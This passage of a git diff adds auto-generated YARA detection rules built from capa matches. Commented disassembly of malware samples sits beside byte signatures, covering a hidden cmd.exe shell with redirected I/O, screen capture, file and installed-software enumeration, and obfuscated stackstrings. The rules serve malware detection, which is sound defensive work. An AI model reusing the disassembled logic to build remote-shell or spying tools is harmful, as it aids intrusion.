directory exists + - create directory + 12EA 02 ldarg.0 + 12EB 7b 9e 00 00 04 ldfld _temp_dir1 + 12F0 28 61 00 00 0a call System.IO.Directory::Exists + 12F5 2d 0c brtrue.s 0x1303 + 12F7 02 ldarg.0 + 12F8 7b 9e 00 00 04 ldfld _temp_dir1 + 12FD 28 54 00 00 0a call System.IO.Directory::CreateDirectory + 1302 26 pop + 1303 2a ret + */ + $c13 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 2D ?? 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 2A } + /* +function Reqss.Reqss::b__13 0x06000035@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - delete directory + 0B0B 02 ldarg.0 + 0B0C 7b 9e 00 00 04 ldfld _temp_dir1 + 0B11 17 ldc.i4.1 + 0B12 28 53 00 00 0a call System.IO.Directory::Delete + 0B17 2a ret + */ + $c14 = { 02 7B ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__e 0x06000030@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - delete file + 0A5F 02 ldarg.0 + 0A60 7b 9e 00 00 04 ldfld _temp_dir1 + 0A65 28 51 00 00 0a call System.IO.File::Delete + 0A6A 2a ret + */ + $c15 = { 02 7B ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__8 0x0600002a@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - enumerate files on Windows + 0900 02 ldarg.0 + 0901 7b a0 00 00 04 ldfld dir1 + 0906 6f 4b 00 00 0a callvirt System.IO.DirectoryInfo::GetDirectories + 090B 0b stloc.1 + 090C 16 ldc.i4.0 + 090D 0c stloc.2 + 090E 2b 24 br.s 0x934 + 0910 07 ldloc.1 + 0911 08 ldloc.2 + 0912 9a ldelem.ref + 0913 0a stloc.0 + 0914 02 ldarg.0 + 0915 25 dup + 0916 7b a1 00 00 04 ldfld _res2 + 091B 06 ldloc.0 + 091C 6f 4c 00 00 0a callvirt System.IO.FileSystemInfo::get_Name + 0921 72 39 00 00 70 ldstr ":d:0|" + 0926 28 4d 00 00 0a call System.String::Concat + 092B 7d a1 00 00 04 stfld _res2 + 0930 08 ldloc.2 + 0931 17 ldc.i4.1 + 0932 58 add + 0933 0c stloc.2 + 0934 08 ldloc.2 + 0935 07 ldloc.1 + 0936 8e ldlen + 0937 69 conv.i4 + 0938 32 d6 blt.s 0x910 + 093A 2a ret + */ + $c16 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 16 0C 2B ?? 07 08 9A 0A 02 25 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 2A } + /* +function Reqss.Reqss::b__9 0x0600002b@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - enumerate files on Windows + - get file size + 0948 02 ldarg.0 + 0949 7b a0 00 00 04 ldfld dir1 + 094E 6f 4e 00 00 0a callvirt System.IO.DirectoryInfo::GetFiles + 0953 0b stloc.1 + 0954 16 ldc.i4.0 + 0955 0c stloc.2 + 0956 2b 54 br.s 0x9ac + 0958 07 ldloc.1 + 0959 08 ldloc.2 + 095A 9a ldelem.ref + 095B 0a stloc.0 + 095C 02 ldarg.0 + 095D 25 dup + 095E 7b a1 00 00 04 ldfld _res2 + 0963 0d stloc.3 + 0964 1b ldc.i4.5 + 0965 8d 01 00 00 01 newarr System.Object + 096A 13 04 stloc.s local(0x0004) + 096C 11 04 ldloc.s local(0x0004) + 096E 16 ldc.i4.0 + 096F 09 ldloc.3 + 0970 a2 stelem.ref + 0971 11 04 ldloc.s local(0x0004) + 0973 17 ldc.i4.1 + 0974 06 ldloc.0 + 0975 6f 4c 00 00 0a callvirt System.IO.FileSystemInfo::get_Name + 097A a2 stelem.ref + 097B 11 04 ldloc.s local(0x0004) + 097D 18 ldc.i4.2 + 097E 72 45 00 00 70 ldstr ":f:" + 0983 a2 stelem.ref + 0984 11 04 ldloc.s local(0x0004) + 0986 19 ldc.i4.3 + 0987 06 ldloc.0 + 0988 6f 4f 00 00 0a callvirt System.IO.FileInfo::get_Length + 098D 8c 31 00 00 01 box System.Int64 + 0992 a2 stelem.ref + 0993 11 04 ldloc.s local(0x0004) + 0995 1a ldc.i4.4 + 0996 72 23 00 00 70 ldstr "|" + 099B a2 stelem.ref + 099C 11 04 ldloc.s local(0x0004) + 099E 28 49 00 00 0a call System.String::Concat + 09A3 7d a1 00 00 04 stfld _res2 + 09A8 08 ldloc.2 + 09A9 17 ldc.i4.1 + 09AA 58 add + 09AB 0c stloc.2 + 09AC 08 ldloc.2 + 09AD 07 ldloc.1 + 09AE 8e ldlen + 09AF 69 conv.i4 + 09B0 32 a6 blt.s 0x958 + 09B2 2a ret + */ + $c17 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0B 16 0C 2B ?? 07 08 9A 0A 02 25 7B ?? ?? ?? ?? 0D 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 09 A2 11 ?? 17 06 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? 19 06 6F ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? 08 17 58 0C 08 07 8E 69 32 ?? 2A } + /* +function Shll.ShellEx::ctor 0x06000081@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - create a process with modified I/O handles and window + 21F0 14 ldnull + 21F1 0a stloc.0 + 21F2 14 ldnull + 21F3 0b stloc.1 + 21F4 14 ldnull + 21F5 0c stloc.2 + 21F6 02 ldarg.0 + 21F7 72 01 00 00 70 ldstr "" + 21FC 7d 83 00 00 04 stfld _lastLineOut + 2201 02 ldarg.0 + 2202 72 01 00 00 70 ldstr "" + 2207 7d 87 00 00 04 stfld _adm_token + 220C 02 ldarg.0 + 220D 28 0f 00 00 0a call System.Object::.ctor + 2212 02 ldarg.0 + 2213 17 ldc.i4.1 + 2214 7d 81 00 00 04 stfld __isRunning + 2219 02 ldarg.0 + 221A 73 58 00 00 0a newobj System.Diagnostics.Process::.ctor + 221F 7d 7d 00 00 04 stfld __ps + 2224 02 ldarg.0 + 2225 73 55 00 00 0a newobj System.Diagnostics.ProcessStartInfo::.ctor + 222A 7d 7e 00 00 04 stfld __psi + 222F 02 ldarg.0 + 2230 7b 7e 00 00 04 ldfld __psi + 2235 72 45 01 00 70 ldstr "C:\Windows\System32\cmd.exe" + 223A 6f 56 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_FileName + 223F 02 ldarg.0 + 2240 7b 7e 00 00 04 ldfld __psi + 2245 17 ldc.i4.1 + 2246 6f 6d 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardInput + 224B 02 ldarg.0 + 224C 7b 7e 00 00 04 ldfld __psi + 2251 17 ldc.i4.1 + 2252 6f 6e 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput + 2257 02 ldarg.0 + 2258 7b 7e 00 00 04 ldfld __psi + 225D 17 ldc.i4.1 + 225E 6f 6f 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_RedirectStandardError + 2263 02 ldarg.0 + 2264 7b 7e 00 00 04 ldfld __psi + 2269 16 ldc.i4.0 + 226A 6f 70 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_UseShellExecute + 226F 02 ldarg.0 + 2270 7b 7e 00 00 04 ldfld __psi + 2275 17 ldc.i4.1 + 2276 6f 71 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_CreateNoWindow + 227B 02 ldarg.0 + 227C 7b 7e 00 00 04 ldfld __psi + 2281 72 4d 00 00 70 ldstr "C:\" + 2286 6f 57 00 00 0a callvirt System.Diagnostics.ProcessStartInfo::set_WorkingDirectory + 228B 02 ldarg.0 + 228C 7b 7d 00 00 04 ldfld __ps + 2291 02 ldarg.0 + 2292 7b 7e 00 00 04 ldfld __psi + 2297 6f 59 00 00 0a callvirt System.Diagnostics.Process::set_StartInfo + 229C 02 ldarg.0 + 229D 7b 7d 00 00 04 ldfld __ps + 22A2 6f 5a 00 00 0a callvirt System.Diagnostics.Process::Start + 22A7 26 pop + 22A8 02 ldarg.0 + 22A9 06 ldloc.0 + 22AA 2d 0d brtrue.s 0x22b9 + 22AC 02 ldarg.0 + 22AD fe 06 84 00 00 06 ldftn <.ctor>b__0 + 22B3 73 72 00 00 0a newobj System.Threading.ParameterizedThreadStart::.ctor + 22B8 0a stloc.0 + 22B9 06 ldloc.0 + 22BA 73 73 00 00 0a newobj System.Threading.Thread::.ctor + 22BF 7d 7f 00 00 04 stfld __t1 + 22C4 02 ldarg.0 + 22C5 7b 7f 00 00 04 ldfld __t1 + 22CA 02 ldarg.0 + 22CB 7b 7d 00 00 04 ldfld __ps + 22D0 6f 74 00 00 0a callvirt System.Threading.Thread::Start + 22D5 02 ldarg.0 + 22D6 07 ldloc.1 + 22D7 2d 0d brtrue.s 0x22e6 + 22D9 02 ldarg.0 + 22DA fe 06 85 00 00 06 ldftn <.ctor>b__1 + 22E0 73 72 00 00 0a newobj System.Threading.ParameterizedThreadStart::.ctor + 22E5 0b stloc.1 + 22E6 07 ldloc.1 + 22E7 73 73 00 00 0a newobj System.Threading.Thread::.ctor + 22EC 7d 80 00 00 04 stfld __t2 + 22F1 02 ldarg.0 + 22F2 7b 80 00 00 04 ldfld __t2 + 22F7 02 ldarg.0 + 22F8 7b 7d 00 00 04 ldfld __ps + 22FD 6f 74 00 00 0a callvirt System.Threading.Thread::Start + 2302 02 ldarg.0 + 2303 73 75 00 00 0a newobj System.Timers.Timer::.ctor + 2308 7d 84 00 00 04 stfld _timer + 230D 02 ldarg.0 + 230E 7b 84 00 00 04 ldfld _timer + 2313 23 00 00 00 00 00 40 59 40ldc.r8 101.0 + 231C 6f 76 00 00 0a callvirt System.Timers.Timer::set_Interval + 2321 02 ldarg.0 + 2322 7b 84 00 00 04 ldfld _timer + 2327 08 ldloc.2 + 2328 2d 0d brtrue.s 0x2337 + 232A 02 ldarg.0 + 232B fe 06 86 00 00 06 ldftn <.ctor>b__2 + 2331 73 77 00 00 0a newobj System.Timers.ElapsedEventHandler::.ctor + 2336 0c stloc.2 + 2337 08 ldloc.2 + 2338 6f 78 00 00 0a callvirt System.Timers.Timer::add_Elapsed + 233D 02 ldarg.0 + 233E 7b 84 00 00 04 ldfld _timer + 2343 17 ldc.i4.1 + 2344 6f 79 00 00 0a callvirt System.Timers.Timer::set_Enabled + 2349 2a ret + */ + $c18 = { 14 0A 14 0B 14 0C 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 72 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 28 ?? ?? ?? ?? 02 17 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 16 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 02 06 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0A 06 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 07 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0B 07 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 73 ?? ?? ?? ?? 7D ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 23 ?? ?? ?? ?? ?? ?? ?? ?? 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 08 2D ?? 02 FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 0C 08 6F ?? ?? ?? ?? 02 7B ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__42 0x06000062@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - query or enumerate registry key + 112B 02 ldarg.0 + 112C 7e 5b 00 00 0a ldsfld Microsoft.Win32.Registry::LocalMachine + 1131 72 55 00 00 70 ldstr "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" + 1136 6f 5c 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 113B 7d a6 00 00 04 stfld _temp_key_ + 1140 2a ret + */ + $c19 = { 02 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 2A } + /* +function Reqss.Reqss::b__43 0x06000063@1c444ebeba24dcba8628b7dfe5fec7c6 with 2 features: + - query or enumerate registry key + - query or enumerate registry value + 1150 02 ldarg.0 + 1151 7b a6 00 00 04 ldfld _temp_key_ + 1156 6f 5d 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetSubKeyNames + 115B 0c stloc.2 + 115C 16 ldc.i4.0 + 115D 0d stloc.3 + 115E 38 a5 00 00 00 br 0x1208 + 1163 08 ldloc.2 + 1164 09 ldloc.3 + 1165 9a ldelem.ref + 1166 0a stloc.0 + 1167 02 ldarg.0 + 1168 7b a6 00 00 04 ldfld _temp_key_ + 116D 06 ldloc.0 + 116E 6f 5c 00 00 0a callvirt Microsoft.Win32.RegistryKey::OpenSubKey + 1173 0b stloc.1 + 1174 02 ldarg.0 + 1175 25 dup + 1176 7b a1 00 00 04 ldfld _res2 + 117B 13 04 stloc.s local(0x0004) + 117D 1f 09 ldc.i4.s 0x9 + 117F 8d 01 00 00 01 newarr System.Object + 1184 13 05 stloc.s local(0x0005) + 1186 11 05 ldloc.s local(0x0005) + 1188 16 ldc.i4.0 + 1189 11 04 ldloc.s local(0x0004) + 118B a2 stelem.ref + 118C 11 05 ldloc.s local(0x0005) + 118E 17 ldc.i4.1 + 118F 07 ldloc.1 + 1190 72 bd 00 00 70 ldstr "DisplayName" + 1195 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 119A a2 stelem.ref + 119B 11 05 ldloc.s local(0x0005) + 119D 18 ldc.i4.2 + 119E 72 d5 00 00 70 ldstr "_;;;" + 11A3 a2 stelem.ref + 11A4 11 05 ldloc.s local(0x0005) + 11A6 19 ldc.i4.3 + 11A7 07 ldloc.1 + 11A8 72 df 00 00 70 ldstr "DisplayVersion" + 11AD 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11B2 a2 stelem.ref + 11B3 11 05 ldloc.s local(0x0005) + 11B5 1a ldc.i4.4 + 11B6 72 d5 00 00 70 ldstr "_;;;" + 11BB a2 stelem.ref + 11BC 11 05 ldloc.s local(0x0005) + 11BE 1b ldc.i4.5 + 11BF 07 ldloc.1 + 11C0 72 fd 00 00 70 ldstr "InstallDate" + 11C5 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11CA a2 stelem.ref + 11CB 11 05 ldloc.s local(0x0005) + 11CD 1c ldc.i4.6 + 11CE 72 d5 00 00 70 ldstr "_;;;" + 11D3 a2 stelem.ref + 11D4 11 05 ldloc.s local(0x0005) + 11D6 1d ldc.i4.7 + 11D7 07 ldloc.1 + 11D8 72 15 01 00 70 ldstr "Publisher" + 11DD 6f 5e 00 00 0a callvirt Microsoft.Win32.RegistryKey::GetValue + 11E2 a2 stelem.ref + 11E3 11 05 ldloc.s local(0x0005) + 11E5 1e ldc.i4.8 + 11E6 72 29 01 00 70 ldstr "_|" + 11EB a2 stelem.ref + 11EC 11 05 ldloc.s local(0x0005) + 11EE 28 49 00 00 0a call System.String::Concat + 11F3 7d a1 00 00 04 stfld _res2 + 11F8 de 0a leave.s 0x1204 + 11FA 07 ldloc.1 + 11FB 2c 06 brfalse.s 0x1203 + 11FD 07 ldloc.1 + 11FE 6f 2f 00 00 0a callvirt System.IDisposable::Dispose + 1203 dc endfinally + 1204 09 ldloc.3 + 1205 17 ldc.i4.1 + 1206 58 add + 1207 0d stloc.3 + 1208 09 ldloc.3 + 1209 08 ldloc.2 + 120A 8e ldlen + 120B 69 conv.i4 + 120C 3f 52 ff ff ff blt 0x1163 + 1211 2a ret + */ + $c20 = { 02 7B ?? ?? ?? ?? 6F ?? ?? ?? ?? 0C 16 0D 38 ?? ?? ?? ?? 08 09 9A 0A 02 7B ?? ?? ?? ?? 06 6F ?? ?? ?? ?? 0B 02 25 7B ?? ?? ?? ?? 13 ?? 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 11 ?? 17 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 18 72 ?? ?? ?? ?? A2 11 ?? 19 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1A 72 ?? ?? ?? ?? A2 11 ?? 1B 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1C 72 ?? ?? ?? ?? A2 11 ?? 1D 07 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 11 ?? 1E 72 ?? ?? ?? ?? A2 11 ?? 28 ?? ?? ?? ?? 7D ?? ?? ?? ?? DE ?? 07 2C ?? 07 6F ?? ?? ?? ?? DC 09 17 58 0D 09 08 8E 69 3F ?? ?? ?? ?? 2A } + /* +function Screenss.ScreenCapture::CaptureScreen 0x06000072@1c444ebeba24dcba8628b7dfe5fec7c6 with 1 features: + - unmanaged call + 1F5A 02 ldarg.0 + 1F5B 28 7c 00 00 06 call GetDesktopWindow + 1F60 28 73 00 00 06 call CaptureWindow + 1F65 2a ret + */ + $c21 = { 02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2A } + condition: + all of them +} + diff --git a/yara/expected_9324d1a8ae37a36ae560c37448c9705a.exe_.yar b/yara/expected_9324d1a8ae37a36ae560c37448c9705a.exe_.yar new file mode 100644 index 0000000..b636ef1 --- /dev/null +++ b/yara/expected_9324d1a8ae37a36ae560c37448c9705a.exe_.yar @@ -0,0 +1,7005 @@ +rule super_rule_9324d +{ + meta: + author = "CAPA Matches" + date_created = "2023-08-10" + date_modified = "2023-08-10" + description = "" + md5 = "9324d1a8ae37a36ae560c37448c9705a" + strings: + /* +Basic Block at 0x004031a0@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x004031a0 + .text:0x004031a0 FUNC: int bfastcall_caller sub_004031a0( int eax, int edx, ) [2 XREFS] + .text:0x004031a0 + .text:0x004031a0 Stack Variables: (offset from initial top of stack) + .text:0x004031a0 -3: int local3 + .text:0x004031a0 -4: int local4 + .text:0x004031a0 -5: int local5 + .text:0x004031a0 -6: int local6 + .text:0x004031a0 -7: int local7 + .text:0x004031a0 -8: int local8 + .text:0x004031a0 -9: int local9 + .text:0x004031a0 -10: int local10 + .text:0x004031a0 -11: int local11 + .text:0x004031a0 -12: int local12 + .text:0x004031a0 -13: int local13 + .text:0x004031a0 -14: int local14 + .text:0x004031a0 -15: int local15 + .text:0x004031a0 -16: int local16 + .text:0x004031a0 + .text:0x004031a0 83ec10 sub esp,16 + .text:0x004031a3 b06c mov al,108 + .text:0x004031a5 8b1524a04000 mov edx,dword [0x0040a024] + .text:0x004031ab 88442401 mov byte [esp + 1],al + .text:0x004031af 88442402 mov byte [esp + 2],al + .text:0x004031b3 b06f mov al,111 + .text:0x004031b5 8d4c2400 lea ecx,dword [esp] + .text:0x004031b9 88442404 mov byte [esp + 4],al + .text:0x004031bd 8844240b mov byte [esp + 11],al + .text:0x004031c1 8b442414 mov eax,dword [esp + 20] + .text:0x004031c5 c644240044 mov byte [esp],68 + .text:0x004031ca 50 push eax + .text:0x004031cb 51 push ecx + .text:0x004031cc 52 push edx + .text:0x004031cd 6a00 push 0 + .text:0x004031cf c644241353 mov byte [esp + 19],83 + .text:0x004031d4 c644241572 mov byte [esp + 21],114 + .text:0x004031d9 c644241674 mov byte [esp + 22],116 + .text:0x004031de c644241757 mov byte [esp + 23],87 + .text:0x004031e3 c644241869 mov byte [esp + 24],105 + .text:0x004031e8 c64424196e mov byte [esp + 25],110 + .text:0x004031ed c644241a64 mov byte [esp + 26],100 + .text:0x004031f2 c644241c77 mov byte [esp + 28],119 + .text:0x004031f7 c644241d00 mov byte [esp + 29],0 + .text:0x004031fc e8eff7ffff call 0x004029f0 ;sub_004029f0(0,str_Consys21.dll_0040a02c,local16,sp+4) + .text:0x00403201 a3c4a94000 mov dword [0x0040a9c4],eax + .text:0x00403206 33c0 xor eax,eax + .text:0x00403208 83c420 add esp,32 + .text:0x0040320b c20400 ret 4 + */ + $c0 = { 83 EC 10 B0 6C 8B 15 ?? ?? ?? ?? 88 44 24 ?? 88 44 24 ?? B0 6F 8D 4C 24 ?? 88 44 24 ?? 88 44 24 ?? 8B 44 24 ?? C6 44 24 ?? 44 50 51 52 6A 00 C6 44 24 ?? 53 C6 44 24 ?? 72 C6 44 24 ?? 74 C6 44 24 ?? 57 C6 44 24 ?? 69 C6 44 24 ?? 6E C6 44 24 ?? 64 C6 44 24 ?? 77 C6 44 24 ?? 00 E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 33 C0 83 C4 20 C2 04 00 } + /* +Basic Block at 0x00403390@9324d1a8ae37a36ae560c37448c9705a with 1 features: + - contain obfuscated stackstrings + .text:0x00403390 + .text:0x00403390 FUNC: int cdecl sub_00403390( int arg0, int arg1, int arg2, ) [4 XREFS] + .text:0x00403390 + .text:0x00403390 Stack Variables: (offset from initial top of stack) + .text:0x00403390 12: int arg2 + .text:0x00403390 8: int arg1 + .text:0x00403390 4: int arg0 + .text:0x00403390 -1023: int local1023 + .text:0x00403390 -1024: int local1024 + .text:0x00403390 -1028: int local1028 + .text:0x00403390 -1029: int local1029 + .text:0x00403390 -1030: int local1030 + .text:0x00403390 -1031: int local1031 + .text:0x00403390 -1032: int local1032 + .text:0x00403390 -1033: int local1033 + .text:0x00403390 -1034: int local1034 + .text:0x00403390 -1035: int local1035 + .text:0x00403390 -1036: int local1036 + .text:0x00403390 -1037: int local1037 + .text:0x00403390 -1038: int local1038 + .text:0x00403390 -1039: int local1039 + .text:0x00403390 -1040: int local1040 + .text:0x00403390 -1041: int local1041 + .text:0x00403390 -1042: int local1042 + .text:0x00403390 -1043: int local1043 + .text:0x00403390 -1044: int local1044 + .text:0x00403390 -1045: int local1045 + .text:0x00403390 -1046: int local1046 + .text:0x00403390 -1047: int local1047 + .text:0x00403390 -1048: int local1048 + .text:0x00403390 -1049: int local1049 + .text:0x00403390 -1050: int local1050 + .text:0x00403390 -1051: int local1051 + .text:0x00403390 -1052: int local1052 + .text:0x00403390 -1053: int local1053 + .text:0x00403390 -1054: int local1054 + .text:0x00403390 -1055: int local1055 + .text:0x00403390 -1056: int local1056 + .text:0x00403390 -1057: int local1057 + .text:0x00403390 -1058: int local1058 + .text:0x00403390 -1059: int local1059 + .text:0x00403390 -1060: int local1060 + .text:0x00403390 -1061: int local1061 + .text:0x00403390 -1062: int local1062 + .text:0x00403390 -1063: int local1063 + .text:0x00403390 -1064: int local1064 + .text:0x00403390 + .text:0x00403390 81ec28040000 sub esp,1064 + .text:0x00403396 56 push esi + .text:0x00403397 57 push edi + .text:0x00403398 b9ff000000 mov ecx,255 + .text:0x0040339d 33c0 xor eax,eax + .text:0x0040339f 8d7c2431 lea edi,dword [esp + 49] + .text:0x004033a3 c644243000 mov byte [esp + 48],0 + .text:0x004033a8 f3ab rep: stosd + .text:0x004033aa 8b3578904000 mov esi,dword [0x00409078] + .text:0x004033b0 6a00 push 0 + .text:0x004033b2 66ab stosd + .text:0x004033b4 aa stosb + .text:0x004033b5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004033b7 b900010000 mov ecx,256 + .text:0x004033bc 33c0 xor eax,eax + .text:0x004033be 8d7c2430 lea edi,dword [esp + 48] + .text:0x004033c2 50 push eax + .text:0x004033c3 f3ab rep: stosd + .text:0x004033c5 ffd6 call esi ;kernel32.Sleep(0) + .text:0x004033c7 b065 mov al,101 + .text:0x004033c9 b253 mov dl,83 + .text:0x004033cb 88442413 mov byte [esp + 19],al + .text:0x004033cf 8844241e mov byte [esp + 30],al + .text:0x004033d3 88442422 mov byte [esp + 34],al + .text:0x004033d7 88442427 mov byte [esp + 39],al + .text:0x004033db b172 mov cl,114 + .text:0x004033dd b073 mov al,115 + .text:0x004033df 6a00 push 0 + .text:0x004033e1 8854240c mov byte [esp + 12],dl + .text:0x004033e5 c644240d59 mov byte [esp + 13],89 + .text:0x004033ea 8854240e mov byte [esp + 14],dl + .text:0x004033ee c644240f54 mov byte [esp + 15],84 + .text:0x004033f3 c644241045 mov byte [esp + 16],69 + .text:0x004033f8 c64424114d mov byte [esp + 17],77 + .text:0x004033fd c64424125c mov byte [esp + 18],92 + .text:0x00403402 c644241343 mov byte [esp + 19],67 + .text:0x00403407 c644241475 mov byte [esp + 20],117 + .text:0x0040340c 884c2415 mov byte [esp + 21],cl + .text:0x00403410 884c2416 mov byte [esp + 22],cl + .text:0x00403414 c64424186e mov byte [esp + 24],110 + .text:0x00403419 c644241974 mov byte [esp + 25],116 + .text:0x0040341e c644241a43 mov byte [esp + 26],67 + .text:0x00403423 c644241b6f mov byte [esp + 27],111 + .text:0x00403428 c644241c6e mov byte [esp + 28],110 + .text:0x0040342d c644241d74 mov byte [esp + 29],116 + .text:0x00403432 884c241e mov byte [esp + 30],cl + .text:0x00403436 c644241f6f mov byte [esp + 31],111 + .text:0x0040343b c64424206c mov byte [esp + 32],108 + .text:0x00403440 88542421 mov byte [esp + 33],dl + .text:0x00403444 c644242374 mov byte [esp + 35],116 + .text:0x00403449 c64424245c mov byte [esp + 36],92 + .text:0x0040344e 88542425 mov byte [esp + 37],dl + .text:0x00403452 884c2427 mov byte [esp + 39],cl + .text:0x00403456 c644242876 mov byte [esp + 40],118 + .text:0x0040345b c644242969 mov byte [esp + 41],105 + .text:0x00403460 c644242a63 mov byte [esp + 42],99 + .text:0x00403465 8844242c mov byte [esp + 44],al + .text:0x00403469 c644242d5c mov byte [esp + 45],92 + .text:0x0040346e c644242e25 mov byte [esp + 46],37 + .text:0x00403473 8844242f mov byte [esp + 47],al + .text:0x00403477 c644243000 mov byte [esp + 48],0 + .text:0x0040347c ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040347e 8b842434040000 mov eax,dword [esp + 1076] + .text:0x00403485 8d4c2408 lea ecx,dword [esp + 8] + .text:0x00403489 50 push eax + .text:0x0040348a 8d542434 lea edx,dword [esp + 52] + .text:0x0040348e 51 push ecx + .text:0x0040348f 52 push edx + .text:0x00403490 ff15d8914000 call dword [0x004091d8] ;user32.wsprintfA(local1024,local1064) + .text:0x00403496 83c40c add esp,12 + .text:0x00403499 6a00 push 0 + .text:0x0040349b ffd6 call esi ;kernel32.Sleep(0) + .text:0x0040349d 8bbc243c040000 mov edi,dword [esp + 1084] + .text:0x004034a4 6a00 push 0 + .text:0x004034a6 57 push edi + .text:0x004034a7 ff15c4904000 call dword [0x004090c4] ;kernel32.lstrlenA(arg2) + .text:0x004034ad 50 push eax + .text:0x004034ae 8b842440040000 mov eax,dword [esp + 1088] + .text:0x004034b5 57 push edi + .text:0x004034b6 6a01 push 1 + .text:0x004034b8 50 push eax + .text:0x004034b9 8d4c2444 lea ecx,dword [esp + 68] + .text:0x004034bd 51 push ecx + .text:0x004034be 6802000080 push 0x80000002 + .text:0x004034c3 e818170000 call 0x00404be0 ;sub_00404be0(0x80000002,local1024,arg1,1,arg2,kernel32.lstrlenA(arg2),0) + .text:0x004034c8 83c41c add esp,28 + .text:0x004034cb 6a00 push 0 + .text:0x004034cd ffd6 call esi ;kernel32.Sleep(0) + .text:0x004034cf 5f pop edi + .text:0x004034d0 5e pop esi + .text:0x004034d1 81c428040000 add esp,1064 + .text:0x004034d7 c3 ret + */ + $c1 = { 81 EC 28 04 00 00 56 57 B9 FF 00 00 00 33 C0 8D 7C 24 ?? C6 44 24 ?? 00 F3 AB 8B 35 ?? ?? ?? ?? 6A 00 66 AB AA FF D6 B9 00 01 00 00 33 C0 8D 7C 24 ?? 50 F3 AB FF D6 B0 65 B2 53 88 44 24 ?? 88 44 24 ?? 88 44 24 ?? 88 44 24 ?? B1 72 B0 73 6A 00 88 54 24 ?? C6 44 24 ?? 59 88 54 24 ?? C6 44 24 ?? 54 C6 44 24 ?? 45 C6 44 24 ?? 4D C6 44 24 ?? 5C C6 44 24 ?? 43 C6 44 24 ?? 75 88 4C 24 ?? 88 4C 24 ?? C6 44 24 ?? 6E C6 44 24 ?? 74 C6 44 24 ?? 43 C6 44 24 ?? 6F C6 44 24 ?? 6E C6 44 24 ?? 74 88 4C 24 ?? C6 44 24 ?? 6F C6 44 24 ?? 6C 88 54 24 ?? C6 44 24 ?? 74 C6 44 24 ?? 5C 88 54 24 ?? 88 4C 24 ?? C6 44 24 ?? 76 C6 44 24 ?? 69 C6 44 24 ?? 63 88 44 24 ?? C6 44 24 